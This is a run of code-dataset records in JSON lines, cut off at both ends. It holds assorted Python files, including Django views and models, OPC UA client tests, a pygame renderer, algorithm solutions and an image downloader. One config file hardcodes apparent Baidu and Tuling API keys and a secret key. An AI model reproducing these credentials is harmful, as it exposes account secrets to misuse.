'__main__':\n main()\n","repo_name":"malukawasaki/GEO5017-Linear-Regression","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19799457656","text":"from api.serializers.AvatarSerializer import AvatarSerializer\nfrom api.models.Avatar import Avatar\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom api.models.User import User\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom rest_framework import status\n\nclass RegisterView (APIView):\n\n def post(self,request):\n user:User = User.objects.register(data=request.data)\n user.status = True\n user.save();\n avatar = Avatar.objects.create()\n user.avatar = avatar\n user.save()\n avatar = AvatarSerializer(avatar)\n token = RefreshToken.for_user(user)\n token = {\n \"refresh\": str(token),\n \"access\": str(token.access_token)\n }\n \n return Response({\n \"message\": \"User Created\",\n \"token\": token,\n \"avatar\": avatar.data\n })\n \n ","repo_name":"devup2332/backend-chat-app","sub_path":"api/views/RegisterUser.py","file_name":"RegisterUser.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74132856051","text":"import pygame\nfrom random import randrange\n\nfrom playerArea import PlayerArea\nfrom territory import Territory\nfrom map import Map\nfrom game_state import GameState\nfrom groups import Groups\nfrom territory_hex import King\n\nclass Render(pygame.sprite.Sprite):\n\n pngs = {\n 0: \"./sprites/background1.png\",\n 1: \"./sprites/background_your_turn.png\"\n }\n\n def __init__(self, width: int, height: int, game_state: GameState) -> None:\n pygame.sprite.Sprite.__init__(self) # Call the parent class (Sprite) constructor\n\n self.width = width\n self.height = height\n self.game_state = game_state\n self.nPlayers = game_state.nPlayers\n\n self.set_image(0)\n self.rect = (0, 0, *PlayerArea.size)\n\n # initialize player boards\n p0_center = (self.width * 1 / 8, self.height * 1 / 4)\n p1_center = (self.width * 1 / 8, self.height * 3 / 4)\n p2_center = (self.width * 7 / 8, self.height * 1 / 4)\n p3_center = (self.width * 7 / 8, self.height * 3 / 4)\n\n self.player_areas = []\n for player_number, center in enumerate([p0_center, p1_center, p2_center, p3_center]):\n team = player_number % 2\n cube_counts = 
game_state.players[player_number].court.get_cubes()\n # cube_counts = [randrange(0, 18) for i in range(5)]\n cache_list = game_state.players[player_number].cache.get_cube_list()\n # cache_list = sorted([randrange(0, 4) for i in range(7)])\n self.player_areas.append(PlayerArea(*center, team, cube_counts, cache_list))\n\n self.map = Map(self.width / 2, self.height / 2, [0] * 15)\n # self.terr = Territory(self.width / 2, self.height / 2, 0, 4)\n\n self.king_loc = 0\n self.king_width = 35\n self.king = King((self.map.territories[self.king_loc].x, self.map.territories[self.king_loc].y), self.king_width)\n\n def set_image(self, i):\n png_image = pygame.image.load(self.pngs[i])\n self.image = pygame.transform.smoothscale(png_image, (self.width, self.height))\n\n def update_game_state(self, game_state: GameState) -> None:\n print(\"render is updating game state\")\n for (player_area, game_player) in zip(self.player_areas, game_state.players):\n player_area.update(game_player)\n\n for color_id, controlling_player in enumerate(game_state.court_control_list):\n if controlling_player is not None:\n self.player_areas[controlling_player].show_control(color_id)\n\n self.map.update(game_state.territories)\n\n self.move_king(game_state.king)\n pass\n # def __init__(self, nPlayers, whose_turn, players, court_control_list, territories, king):\n\n def move_king(self, new_loc):\n self.king_loc = new_loc\n terr = self.map.territories[self.king_loc]\n coords = self.map.get_xy_by_angle_index(terr.outer_angle_index, terr.outer_radius - 60)\n self.king.move_center(coords)\n\n def draw(self, groups: Groups) -> None:\n self.add(groups.background_group)\n self.map.draw(groups)\n self.king.draw(groups.king)\n # self.terr.draw(group)\n for player_area in self.player_areas:\n player_area.draw(groups)","repo_name":"ianeyk/Carolus-Magnus","sub_path":"v1.0/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43664898151","text":"from uuid import uuid4\nfrom django.db import models\n\nfrom api.models.managers import CompanyManager\n\n\nclass Company(models.Model):\n \"\"\"\n - ID (en el formato que se considere más seguro)\n - Nombre\n - Status (activa/inactiva)\n \"\"\"\n\n objects = CompanyManager()\n\n COMPANY_STATUS_CHOICES = (\n (\"active\", \"Active\"),\n (\"inactive\", \"Inactive\"),\n )\n uuid = models.UUIDField(editable=False, unique=True, default=uuid4)\n name = models.CharField(max_length=100)\n status = models.CharField(\n choices=COMPANY_STATUS_CHOICES,\n default='active',\n max_length=10\n )\n\n def __str__(self):\n return f\"{self.name.title()} - {self.get_status_display()}\"\n\n def get_status_display(self):\n return dict(self.COMPANY_STATUS_CHOICES)[self.status]\n\n class Meta:\n verbose_name = \"Company\"\n verbose_name_plural = \"Companies\"\n ordering = [\"name\"]\n","repo_name":"JuanDM93/plerk-django-transactions","sub_path":"api/models/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73025875573","text":"import unittest\n\nfrom opcua import Client\nfrom opcua import Server\nfrom opcua import ua\n\nfrom tests_subscriptions import SubscriptionTests\nfrom tests_common import CommonTests, add_server_methods\nfrom tests_xml import XmlTests \n\nport_num1 = 48510\n\n\nclass TestClient(unittest.TestCase, CommonTests, SubscriptionTests, 
XmlTests):\n\n '''\n Run common tests on client side\n Of course we need a server so we start also start a server\n Tests that can only be run on client side must be defined in this class\n '''\n @classmethod\n def setUpClass(cls):\n # start our own server\n cls.srv = Server()\n cls.srv.set_endpoint('opc.tcp://localhost:{0:d}'.format(port_num1))\n add_server_methods(cls.srv)\n cls.srv.start()\n\n # start admin client\n # long timeout since travis (automated testing) can be really slow\n cls.clt = Client('opc.tcp://admin@localhost:{0:d}'.format(port_num1), timeout=10)\n cls.clt.connect()\n cls.opc = cls.clt\n\n # start anonymous client\n cls.ro_clt = Client('opc.tcp://localhost:{0:d}'.format(port_num1))\n cls.ro_clt.connect()\n\n @classmethod\n def tearDownClass(cls):\n #stop our clients\n cls.ro_clt.disconnect()\n cls.clt.disconnect()\n # stop the server \n cls.srv.stop()\n\n def test_service_fault(self):\n request = ua.ReadRequest()\n request.TypeId = ua.FourByteNodeId(999) # bad type!\n with self.assertRaises(ua.UaStatusCodeError):\n self.clt.uaclient._uasocket.send_request(request)\n\n def test_objects_anonymous(self):\n objects = self.ro_clt.get_objects_node()\n with self.assertRaises(ua.UaStatusCodeError):\n objects.set_attribute(ua.AttributeIds.WriteMask, ua.DataValue(999))\n with self.assertRaises(ua.UaStatusCodeError):\n f = objects.add_folder(3, 'MyFolder')\n\n def test_folder_anonymous(self):\n objects = self.clt.get_objects_node()\n f = objects.add_folder(3, 'MyFolderRO')\n f_ro = self.ro_clt.get_node(f.nodeid)\n self.assertEqual(f, f_ro)\n with self.assertRaises(ua.UaStatusCodeError):\n f2 = f_ro.add_folder(3, 'MyFolder2')\n\n def test_variable_anonymous(self):\n objects = self.clt.get_objects_node()\n v = objects.add_variable(3, 'MyROVariable', 6)\n v.set_value(4) #this should work\n v_ro = self.ro_clt.get_node(v.nodeid)\n with self.assertRaises(ua.UaStatusCodeError):\n v_ro.set_value(2)\n self.assertEqual(v_ro.get_value(), 4)\n v.set_writable(True)\n v_ro.set_value(2) #now it should work\n self.assertEqual(v_ro.get_value(), 2)\n v.set_writable(False)\n with self.assertRaises(ua.UaStatusCodeError):\n v_ro.set_value(9)\n self.assertEqual(v_ro.get_value(), 2)\n\n def test_context_manager(self):\n \"\"\" Context manager calls connect() and disconnect()\n \"\"\"\n state = [0]\n def increment_state(self, *args, **kwargs):\n state[0] += 1\n\n # create client and replace instance methods with dummy methods\n client = Client('opc.tcp://dummy_address:10000')\n client.connect = increment_state.__get__(client)\n client.disconnect = increment_state.__get__(client)\n\n assert state[0] == 0\n with client:\n # test if client connected\n self.assertEqual(state[0], 1)\n # test if client disconnected\n self.assertEqual(state[0], 2)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/FreeOpcUa_python-opcua/python-opcua-master/tests/tests_client.py","file_name":"tests_client.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"13896631851","text":"#coding=utf-8\n\n#录音文件保存路径\nWAVE_OUTPUT_FILENAME = \".out.wav\"\n#百度TTS合成音频文件路径\nBAIDU_TTS_MP3=\".tts.mp3\"\n\n#百度API设置\nAPI_KEY=\"f2QNCuDq3Xgr7PdpvIlzUG6GkSu806Ih\"\nSECRET_KEY=\"eIaCGbuPAtWtr7U98iVxDGxGHlrh6sGi\"\n\n#图灵API设置\nTULING_KEY = \"8950e43e268d4ea7b567658f21e3ce1c\"\nTULING_API = \"http://www.tuling123.com/openapi/api\"\n\n\n#触发录音阀值\nTHRESHOLD = 800\n\n#开启debug信息\nDEBUG = 
True\n","repo_name":"jingzhaoyang/Echo","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"ja","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"22887114971","text":"import argparse\nimport sys\nimport os\n\nfrom lintern.rewriter import CodeRewriter, rewrite_rules\nfrom lintern.cfile import add_required_include_paths\n\nimport yaml\n\n\ndef get_default_config_data():\n return {r.__class__.__name__ : True for r in rewrite_rules}\n\ndef verify_config_data(cfg_data):\n default = get_default_config_data()\n\n for key in cfg_data:\n if key not in default:\n return \"unrecognised option '%s'\" % key\n\n if not isinstance(cfg_data[key], bool):\n return \"invalid value '%s' for option '%s'\" % (str(cfg_data[key]), key)\n\n return None\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--indent-type', default='space', dest='indent_type',\n choices=['space', 'tab'], help=\"Set the type of indentation to be used\")\n parser.add_argument('-l', '--indent-level', default=4, dest='indent_level',\n help=\"Set the number of characters to use for a single indent level\")\n parser.add_argument('-f', '--config-file', default='.lintern', dest='config_file',\n help=\"Filename to read configuration from\")\n parser.add_argument('-i', '--in-place', action='store_true', dest='in_place',\n help=\"Re-write files in place. Default behaviour is to print \"\n \"modified files to stdout.\")\n parser.add_argument('-g', '--generate-config', action='store_true', dest='gen_config',\n help=\"Generate default configuration data, and print to stdout.\")\n parser.add_argument('-e', '--ignore-errors', action='store_true', dest='ignore_errors',\n help=\"Continue trying to parse & rewrite files, even if a parse\"\n \"error is encountered. 
Default is to bail out when any parse errors\"\n \"are encountered in a C file.\")\n parser.add_argument('-d', '--add-include-dir', action='append', dest='include_dirs',\n help=\"Add an extra include directory to pass to libclang\")\n parser.add_argument('filename', nargs='*')\n args = parser.parse_args()\n\n if args.gen_config:\n print(\"\\n\" + yaml.dump(get_default_config_data()))\n return 0\n\n if not args.filename:\n print(\"Please provide one or more input filenames.\")\n return 1\n\n if os.path.isfile(args.config_file):\n cfg_data = None\n\n try:\n with open(args.config_file, 'r') as fh:\n cfg_data = yaml.load(fh, Loader=yaml.FullLoader)\n except:\n print(\"Malformed file '%s', stopping.\" % args.config_file)\n return 1\n\n if cfg_data is None:\n print(\"Empty config file '%s', using default options.\" % args.config_file)\n cfg_data = get_default_config_data()\n else:\n result = verify_config_data(cfg_data)\n if result is not None:\n print(\"Error reading file %s: %s\" % (args.config_file, result))\n return 1\n else:\n print(\"configuration file '%s' not found, using default options.\" % args.config_file)\n cfg_data = get_default_config_data()\n\n extra_dirs = [] if args.include_dirs is None else args.include_dirs\n add_required_include_paths(extra_include_paths=extra_dirs)\n\n r = CodeRewriter(args, cfg_data)\n if r.files is None:\n return 1\n\n r.rewrite()\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"eriknyquist/lintern","sub_path":"lintern/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13191066285","text":"n = int(input())\nnums = list(map(int, input().split()))\n\nmax_num = max(nums)\n\nvisited = [False] * (max_num + 1)\nright = 0\nanswer = 0\ncount = 0\n\nfor left in range(n):\n while right < n and not visited[nums[right]]:\n visited[nums[right]] = True\n answer += 1\n right += 1\n\n if visited[nums[left]]:\n visited[nums[left]] = False\n answer += right - (left + 1)\n\nprint(answer)","repo_name":"Eui9179/algorithm-study","sub_path":"programmers/python/score_kit/two_pointer/boj13144.py","file_name":"boj13144.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10079387268","text":"'''\n394. 字符串解码\n给定一个经过编码的字符串,返回它解码后的字符串。\n\n编码规则���: k[encoded_string],表示其中方括号内部的 encoded_string 正好重复 k 次。注意 k 保证为正整数。\n\n你可以认为输入字符串总是有效的;输入字符串中没有额外的空格,且输入的方括号总是符合格式要求的。\n\n此外,你可以认为原始数据不包含数字,所有的数字只表示重复的次数 k ,例如不会出现像 3a 或 2[4] 的输入。\n\n示例:\n\ns = \"3[a]2[bc]\", 返回 \"aaabcbc\".\ns = \"3[a2[c]]\", 返回 \"accaccacc\".\ns = \"2[abc]3[cd]ef\", 返回 \"abcabccdcdcdef\".\n\n394. Decode String\nGiven an encoded string, return its decoded string.\n\nThe encoding rule is: k[encoded_string], where the encoded_string inside the square brackets is being repeated exactly k times. Note that k is guaranteed to be a positive integer.\n\nYou may assume that the input string is always valid; No extra white spaces, square brackets are well-formed, etc.\n\nFurthermore, you may assume that the original data does not contain any digits and that digits are only for those repeat numbers, k. 
For example, there won't be input like 3a or 2[4].\n\nExamples:\n\ns = \"3[a]2[bc]\", return \"aaabcbc\".\ns = \"3[a2[c]]\", return \"accaccacc\".\ns = \"2[abc]3[cd]ef\", return \"abcabccdcdcdef\".\n'''\n\n\nclass Solution(object):\n def decodeString(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n res = ''\n i = 0\n\n if not s:\n return \"\"\n while i < len(s):\n if \"0\" <= s[i] <= \"9\":\n num = int(s[i])\n while \"0\" <= s[i+1] <= \"9\":\n num = 10*num + int(s[i+1])\n i += 1\n # num = int(num)\n print(num, i)\n j = i+1\n if s[i+1] == \"[\":\n j = i + 2\n left = 0\n while s[j] != \"]\" or left != 0:\n if s[j] == \"[\":\n left += 1\n if s[j] == \"]\":\n left -= 1\n j += 1\n res += num * self.decodeString(s[i+2:j])\n i = j+1\n else:\n res += s[i]\n i += 1\n return res\n\n\nif __name__ == '__main__':\n demo = Solution()\n l = [\"3[a2[c]]\", \"3[a]2[bc]\", \"2[abc]3[cd]ef\"]\n for s in l:\n res = demo.decodeString(s)\n print(res)\n\n\n\n'''\n方法一:栈操作\n思路和算法\n\n本题中可能出现括号嵌套的情况,比如 2[a2[bc]],这种情况下我们可以先转化成 2[abcbc],在转化成 abcbcabcbc。我们可以把字母、数字和括号看成是独立的 TOKEN,并用栈来维护这些 TOKEN。具体的做法是,遍历这个栈:\n\n如果当前的字符为数位,解析出一个数字(连续的多个数位)并进栈\n如果当前的字符为字母或者左括号,直接进栈\n如果当前的字符为右括号,开始出栈,一直到左括号出栈,出栈序列反转后拼接成一个字符串,此时取出栈顶的数字(此时栈顶一定是数字,想想为什么?),就是这个字符串应该出现的次数,我们根据这个次数和字符串构造出新的字符串并进栈\n重复如上操作,最终将栈中的元素按照从栈底到栈顶的顺序拼接起来,就得到了答案。注意:这里可以用不定长数组来模拟栈操作,方便从栈底向栈顶遍历。\n\nC++JavaGolang\nfunc decodeString(s string) string {\n stk := []string{}\n ptr := 0\n for ptr < len(s) {\n cur := s[ptr]\n if cur >= '0' && cur <= '9' {\n digits := getDigits(s, &ptr)\n stk = append(stk, digits)\n } else if (cur >= 'a' && cur <= 'z' || cur >= 'A' && cur <= 'Z') || cur == '[' {\n stk = append(stk, string(cur))\n ptr++\n } else {\n ptr++\n sub := []string{}\n for stk[len(stk)-1] != \"[\" {\n sub = append(sub, stk[len(stk)-1])\n stk = stk[:len(stk)-1]\n }\n for i := 0; i < len(sub)/2; i++ {\n sub[i], sub[len(sub)-i-1] = sub[len(sub)-i-1], sub[i]\n }\n stk = stk[:len(stk)-1]\n repTime, _ := strconv.Atoi(stk[len(stk)-1])\n stk = stk[:len(stk)-1]\n t := strings.Repeat(getString(sub), repTime)\n stk = append(stk, t)\n }\n }\n return getString(stk)\n}\n\nfunc getDigits(s string, ptr *int) string {\n ret := \"\"\n for ; s[*ptr] >= '0' && s[*ptr] <= '9'; *ptr++ {\n ret += string(s[*ptr])\n }\n return ret\n}\n\nfunc getString(v []string) string {\n ret := \"\"\n for _, s := range v {\n ret += s\n }\n return ret\n}\n复杂度分析\n\n时间复杂度:记解码后得出的字符串长度为 SS,除了遍历一次原字符串 ss,我们还需要将解码后的字符串中的每个字符都入栈,并最终拼接进答案中,故渐进时间复杂度��� O(S+|s|)O(S+∣s∣),即 O(S)O(S)。\n空间复杂度:记解码后得出的字符串长度为 SS,这里用栈维护 TOKEN,栈的总大小最终与 SS 相同,故渐进空间复杂度为 O(S)O(S)。\n方法二:递归\n思路和算法\n\n我们也可以用递归来解决这个问题,从左向右解析字符串:\n\n如果当前位置为数字位,那么后面一定包含一个用方括号表示的字符串,即属于这种情况:k[...]:\n我们可以先解析出一个数字,然后解析到了左括号,递归向下解析后面的内容,遇到对应的右括号就返回,此时我们可以根据解析出的数字 xx 解析出的括号里的字符串 s's \n′\n 构造出一个新的字符串 x \\times s'x×s \n′\n ;\n我们把 k[...] 
解析结束后,再次调用递归函数,解析右括号右边的内容。\n如果当前位置是字母位,那么我们直接解析当前这个字母,然后递归向下解析这个字母后面的内容。\n如果觉得这里讲的比较抽象,可以结合代码理解一下这个过程。\n\n下面我们可以来讲讲这样做的依据,涉及到《编译原理》相关内容,感兴趣的同学可以参考阅读。 根据题目的定义,我们可以推导出这样的巴科斯范式(BNF):\n\n\\begin{aligned} {\\rm String} &\\rightarrow { \\rm Digits \\, [String] \\, String \\, | \\, Alpha \\, String \\, | \\, \\epsilon } \\\\ {\\rm Digits} &\\rightarrow { \\rm Digit \\, Digits \\, | \\, Digit } \\\\ {\\rm Alpha} &\\rightarrow { a | \\cdots | z | A | \\cdots | Z } \\\\ {\\rm Digit} &\\rightarrow { 0 | \\cdots | 9 } \\\\ \\end{aligned}\nString\nDigits\nAlpha\nDigit\n​\t\n \n→Digits[String]String∣AlphaString∣ϵ\n→DigitDigits∣Digit\n→a∣⋯∣z∣A∣⋯∣Z\n→0∣⋯∣9\n​\t\n \n\n\\rm DigitDigit 表示十进制数位,可能的取值是 00 到 99 之间的整数\n\\rm AlphaAlpha 表示字母,可能的取值是大小写字母的集合,共 5252 个\n\\rm DigitDigit 表示一个整数,它的组成是 \\rm DigitDigit 出现一次或多次\n\\rm StringString 代表一个代解析的字符串,它可能有三种构成,如 BNF 所示\n\\rm \\epsilonϵ 表示空串,即没有任何子字符\n由于 \\rm DigitsDigits 和 \\rm AlphaAlpha 构成简单,很容易进行词法分析,我们把它他们看作独立的 TOKEN。那么此时的非终结符有 \\rm StringString,终结符有 \\rm DigitsDigits、\\rm AlphaAlpha 和 \\rm \\epsilonϵ,我们可以根据非终结符和 FOLLOW 集构造出这样的预测分析表:\n\n\\rm AlphaAlpha\t\\rm DigitsDigits\t\\rm \\epsilonϵ\n\\rm StringString\t\\rm String \\rightarrow Alpha \\, StringString→AlphaString\t\\rm String \\rightarrow Digits \\, [String] \\, StringString→Digits[String]String\t\\rm String \\rightarrow \\epsilonString→ϵ\n可见不含多重定义的项,为 LL(1) 文法,即:\n\n从左向右分析(Left-to-right-parse)\n最左推导(Leftmost-derivation)\n超前查看一个符号(1-symbol lookahead)\n它决定了我们从左向右遍历这个字符串,每次只判断当前最左边的一个字符的分析方法是正确的。\n\n代码如下。\n\nC++JavaGolang\nvar (\n src string\n ptr int\n)\n\nfunc decodeString(s string) string {\n src = s\n ptr = 0\n return getString()\n}\n\nfunc getString() string {\n if ptr == len(src) || src[ptr] == ']' {\n return \"\"\n }\n cur := src[ptr]\n repTime := 1\n ret := \"\"\n if cur >= '0' && cur <= '9' {\n repTime = getDigits()\n ptr++\n str := getString()\n ptr++\n ret = strings.Repeat(str, repTime)\n } else if cur >= 'a' && cur <= 'z' || cur >= 'A' && cur <= 'Z' {\n ret = string(cur)\n ptr++\n }\n return ret + getString()\n}\n\nfunc getDigits() int {\n ret := 0\n for ; src[ptr] >= '0' && src[ptr] <= '9'; ptr++ {\n ret = ret * 10 + int(src[ptr] - '0')\n }\n return ret\n}\n复杂度分析\n\n时间复杂度:记解码后得出的字符串长度为 SS,除了遍历一次原字符串 ss,我们还需要将解码后的字符串中的每个字符都拼接进答案中,故渐进时间复杂度为 O(S+|s|)O(S+∣s∣),即 O(S)O(S)。\n空间复杂度:若不考虑答案所占用的空间,那么就只剩递归使用栈空间的大小,这里栈空间的使用和递归树的深度成正比,最坏情况下为 O(|s|)O(∣s∣),故渐进空间复杂度为 O(|s|)O(∣s∣)。\n\n作者:LeetCode-Solution\n链接:https://leetcode-cn.com/problems/decode-string/solution/zi-fu-chuan-jie-ma-by-leetcode-solution/\n来源:力扣(LeetCode)\n著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。\n'''","repo_name":"MecaCho/algorithms_training","sub_path":"algorithms/stack/leetcode-394-DecodeString.py","file_name":"leetcode-394-DecodeString.py","file_ext":"py","file_size_in_byte":9634,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24482002431","text":"#task_3\ndef alg_prima(graph):\n\tin_processing = {(0, u) for u in graph[0]}\n\tin_tree = {0}\n\tedge_list = []\n\twhile True:\n\t\tmin_v = float('+inf')\n\t\tmin_e = None\n\t\tfor e in list(in_processing):\n\t\t\ts, t = e\n\t\t\tif t in in_tree:\n\t\t\t\tin_processing.remove(e)\n\t\t\t\tcontinue\n\t\t\tif graph[s][t] < min_v:\n\t\t\t\tmin_v = graph[s][t]\n\t\t\t\tmin_e = e\n\t\tif min_e is None:\n\t\t\tbreak\n\t\tedge_list.append(min_e)\n\t\tin_processing.update({(min_e[1], v) for v in graph[min_e[1]] if v not in in_tree})\n\t\tin_tree.add(min_e[1])\n\treturn edge_list\n\nn, m = tuple(map(int, input().split()))\ngraph = {i: {} for i in 
range(n)}\nfor j in range(m):\n\ta, b, w = tuple(map(int, input().split()))\n\tgraph[a][b] = w\n\tgraph[b][a] = w\nedge_list = alg_prima(graph)\nw = sum(graph[a][b] for a, b in edge_list)\nprint(w)\nfor i in range(len(edge_list)):\n\tprint(*edge_list[i])\n","repo_name":"Senbjorn/mipt_lab_2016","sub_path":"lab_21/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"716441459","text":"from bs4 import BeautifulSoup\nimport os\nimport asyncio\nfrom aiohttp import ClientSession\n\n\nmain_url = \"https://earthview.withgoogle.com/\"\nloop = asyncio.get_event_loop()\nlock = asyncio.Lock()\ncheckCount = 0\n\n\nasync def DownloadImage(url: str, Count: int):\n async with ClientSession() as session:\n async with session.get(url) as resp:\n with open(f\"{Count}.png\", \"wb\") as file:\n file.write(await resp.read())\n print(f\"write image {Count}\")\n\n\nasync def makeRequest(Count: int):\n global checkCount\n async with ClientSession() as session:\n async with session.get(f\"{main_url}/{Count}\") as resp:\n if not resp.status == 200:\n return\n\n async with lock:\n checkCount += 1\n\n print(f\"Found: {Count}\")\n ImageElement = BeautifulSoup(await resp.text(), \"html.parser\").find(class_=\"photo-view--active\")\n await DownloadImage(ImageElement[\"src\"], Count)\n\n\nasync def main():\n global checkCount\n print(\"earthview with google batch downloader\")\n \n starts = int(input(\"starts at: \"))\n stops = int(input(\"stops at: \"))\n\n try:\n os.mkdir(\"images\")\n except:\n print('folder \"images\" already exists')\n finally:\n os.chdir(\"images\")\n\n await asyncio.gather(*[makeRequest(count) for count in range(starts, stops+1)])\n print(f\"{checkCount}/{stops - starts} check\")\n loop.stop()\n\n\nif __name__ == \"__main__\":\n loop.create_task(main())\n loop.run_forever()\n","repo_name":"Ozkanozsm/earthviewpuller","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33797182000","text":"try:\n from django.utils import unittest\nexcept ImportError:\n import unittest\nfrom django.test.client import Client\nfrom django.conf import settings\n\nclass PagSeguroRetornoViewTest(unittest.TestCase):\n def test_view_retorno_com_get(self):\n c = Client()\n res = c.get(settings.PAGSEGURO_URL_RETORNO)\n self.assertEquals(res.status_code, 302)\n url_final_valida = res['location'].endswith(settings.PAGSEGURO_URL_FINAL)\n self.assertTrue(url_final_valida)\n\n def test_view_retorno_post_ok(self):\n from django_pagseguro import pagseguro\n def mock_req_pagseguro(params):\n return 'VERIFICADO'\n pagseguro._req_pagseguro = mock_req_pagseguro\n c = Client()\n dados = {'StatusTransacao':'Aprovado', 'Referencia':42}\n res = c.post(settings.PAGSEGURO_URL_RETORNO, dados)\n self.assertEquals(res.content, 'OK')\n\n def test_retorno_post_falha(self):\n from django_pagseguro import pagseguro\n def mock_req_pagseguro(params):\n return 'FALSO'\n pagseguro._req_pagseguro = mock_req_pagseguro\n c = Client()\n dados = {'StatusTransacao':'Aprovado', 'Referencia':42}\n res = c.post(settings.PAGSEGURO_URL_RETORNO, dados)\n self.assertEquals(res.content, 
'FALHA')\n","repo_name":"fabiocerqueira/django-pagseguro","sub_path":"django_pagseguro/tests/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"pt","doc_type":"code","stars":61,"dataset":"github-code","pt":"21"} +{"seq_id":"16314430752","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Aug 26 23:29:33 2018\r\n\r\n@author: Raghul\r\n\"\"\"\r\n\r\nprint(\">>FLAMES<<\")\r\n\r\na = input(\"Your Name: \")\r\nb = input(\"Your Crush: \")\r\n\r\nrelation = {'f':a + \" and \" + b + \" are friends.\",\\\r\n 'l':a + \" and \" + b + \" are in love.\",\\\r\n 'a':b + \" have affection on \" + a + \".\",\\\r\n 'm':b+\" will marry \"+a+\".\",\\\r\n 'e':b+\" is an enemy of \"+a+\".\",\\\r\n 's':b+\" is a sister of \"+a+\".\"}\r\n\r\na = list(a.lower().replace(\" \",\"\"))\r\nb = list(b.lower().replace(\" \",\"\"))\r\n\r\nresult = list(\"flames\")\r\n\r\ncount = 0\r\n\r\nfor i in range(len(b)):\r\n if b[i] in a:\r\n a[a.index(b[i])] = '*'\r\n b[i] = '-'\r\n count += 1\r\n\r\nrun = len(a) + len(b) - 2*count\r\n\r\nnewindex = 0\r\n\r\nfor i in range(6,1,-1):\r\n index = (newindex+run-1)%i\r\n result.remove(result[index])\r\n newindex = index%i\r\n\r\nprint(relation[result[0]])\r\n","repo_name":"lugar004/flames","sub_path":"flames.py","file_name":"flames.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40403246171","text":"from decimal import Decimal\n\nfrom store.models import Product\n\n\nclass Cart():\n \n def __init__(self, request):\n\n self.session = request.session\n \n cart = self.session.get('session_key')\n\n if 'session_key' not in request.session:\n\n cart = self.session['session_key'] = {}\n\n self.cart = cart\n\n\n # هذه للتحقق مما اذا تم التعديل علي الاد ام لا \n # اذا كان اامنتج موجود في السلة يقوم بتحديث الكمية\n # واذا كان غير موجود يتم انشاء سلة جديدة بالمنتج وسعره وكميته\n # ثم يتحقق من انه تم التعديل\n\n# -------------------------------\n\n def add(self, product, product_qty):\n \n # تحويل رقم المنتج اللي قيمة نصية\n product_id = str(product.id)\n\n # يتم التحقق هنا مما إذا كان product_id موجودًا بالفعل في سلة التسوق (self.cart) أم لا.\n # وسلة التسوق اتت بالمنتج من الفيو\n if product_id in self.cart:\n \n # سيتم تحديث الكمية الموجودة بالكمية المجلوبة من الفيو\n # qty هوا بمثابة متغير للكمية\n # واذا اضاف كمية اخري سيتم تحديث الكمية بدون عمل سلة جديدة\n self.cart[product_id]['qty'] = product_qty\n\n else:\n \n # سيتم انشاء مدخل جديد في سلة التسوق واضافة المنتج بسعره وكميته\n self.cart[product_id] = {'price': str(product.price), 'qty': product_qty}\n\n # اذا تم التعديل علي الكود \n self.session.modified = True\n\n\n\n # -------------------------------\n\n def delete(self,product):\n \n # جلب المنتج الذي سيحذف من الفيو\n product_id = str(product)\n\n # لو هوا موجود في الكارت\n if product_id in self.cart:\n\n # قم بحذفه\n del self.cart[product_id]\n\n # اذا تم التعديل علي الكود \n self.session.modified = True\n \n\n# --------------------------------------\n\n\n def update(self, product, qty):\n\n # جلب المنتج الذي سيحذف من الفيو\n product_id = str(product)\n\n # جلب الكمية التي اخترتها في هذا المنتج\n product_quantity = qty\n\n # لو هوا موجود في الكارت\n if product_id in self.cart:\n\n # قم بتحديث الكمية الي الكمية المحدثة\n self.cart[product_id]['qty'] = product_quantity\n\n # اذا تم التعديل علي الكود \n self.session.modified = True\n\n\n# -------------------------------------\n # هذه دالة لارجاع مجموع الكميات الموجودة في 
